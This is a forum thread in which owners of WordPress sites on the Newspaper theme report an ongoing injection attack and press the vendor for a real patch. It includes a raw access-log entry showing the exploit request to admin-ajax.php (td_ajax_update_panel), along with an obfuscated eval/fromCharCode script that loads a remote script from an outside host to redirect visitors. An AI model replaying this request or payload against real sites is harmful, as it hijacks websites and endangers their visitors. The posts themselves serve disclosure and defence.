@Calin This is false. I have documented how the unauthorized users are gaining access to WordPress and redirecting the sites. Your patch issued in 12.1.1 is a poor bandaid and easily circumvented. This needs a proper fix.
This continues to be an ongoing issue. Per this post your patch is not sufficient. This needs to be fixed as it’s a critical security threat impacting all of your customers, even those on the latest version.
This patch is not sufficient and this is very poor support:
https://forum.tagdiv.com/topic/sql-injection-in-tagdiv-composer-again/#post-458150
Can we get some actual support on this? It’s a critical security issue on all sites currently running the Newspaper theme and likely impacting your +100,000 customers. There is nothing in the Changelog for the latest version that shows this was addressed so upgrading the theme would not fix it.
Clearing the caches won’t help. We can clearly see on our server logs that it is repeatedly added to the site. The issue is not because it is cached.
The code is being injected. It’s a security flaw in the theme and needs a patch. This is a widespread issue on Newspaper.
11.4.3 and 11.5
TagDiv Support. Please see my other comment. Also, this is how the hackers are injecting the script.
—
135.125.178.115 – – [11/Nov/2022:20:26:49 +0000] “POST /wp-admin/admin-ajax.php HTTP/1.0” 200 1 “https://site-url-removed.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0” 0.000 1.588 1.588 200 1.588 action=td_ajax_update_panel&td_magic_token=c8ae20cbbe&td_option%5Btds_custom_javascript%5D=eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C112%2C115%2C100%2C100%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C41%2C59%2C32%2C118%2C97%2C114%2C32%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C32%2C61%2C32%2C102%2C97%2C108%2C115%2C101%2C59%2C102%2C111%2C114%2C32%2C40%2C118%2C97%2C114%2C32%2C105%2C32%2C61%2C32%2C48%2C59%2C32%2C105%2C32%2C60%2C32%2C112%2C115%2C100%2C100%2C46%2C108%2C101%2C110%2C103%2C116%2C104%2C59%2C32%2C105%2C43%2C43%2C41%2C32%2C123%2C32%2C32%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C41%2C32%2C123%2C32%2C32%2C32%2C9%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C32%2C61%2C61%2C32%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C41%2C123%2C32%2C9%2C9%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C116%2C114%2C117%2C101%2C59%2C32%2C9%2C32%2C125%2C32%2C32%2C32%2C125%2C32%2C32%2C125%2C105%2C102%2C40%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C61%2C102%2C97%2C108%2C115%2C101%2C41%2C123%2C32%2C9%2C118%2C97%2C114%2C32%2C100%2C61%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C59%2C118%2C97%2C114%2C32%2C115%2C61%2C100%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C115%2C46%2C105%2C100%2C61%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C59%2C115%2C46%2C115%2C114%2C99%2C61%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C49%2C48%2C52%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C50%2C44%2C49%2C49%2C53%2C44%2C53%2C56%2C44%2C52%2C55%2C44%2C52%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C57%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C49%2C57%2C44%2C49%2C48%2C49%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C52%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C50%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C50%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C48%2C57%2C44%2C52%2C54%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C48%2C57%2C44%2C52%2C55%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C48%2C54%2C44%2C49%2C49%2C53%2C44%2C54%2C51%2C44%2C49%2C49%2C56%2C44%2C54%2C49%2C44%2C52%2C57%2C44%2C52%2C57%2C44%2C52%2C54%2C44%2C53%2C48%2C44%2C53%2C49%2C41%2C59%2C32%2C105%2C102%2C32%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C32%2C123%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C46%2C112%2C97%2C114%2C101%2C110%2C116%2C78%2C111%2C100%2C101%2C46%2C105%2C110%2C115%2C101%2C114%2C116%2C66%2C101%2C102%2C111%2C114%2C101%2C40%2C115%2C44%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C59%2C125%2C32%2C101%2C108%2C115%2C101%2C32%2C123%2C100%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C39%2C104%2C101%2C97%2C100%2C39%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C115%2C41%2C59%2C125%2C32%2C125%29%29%3B
We’re experiencing this same issue across multiple Newspaper websites. Somehow an unauthorized user is able to upload a plugin through admin-ajax.php and inject the redirect script to: Theme Panel -> Custom Code -> Custom Javascript
it’s being posted to tagdiv custom javascript through action=td_ajax_update_panel.
It seems that this is a widespread issue on Newspaper and needs an urgent patch!
The script that’s being injected is:
eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));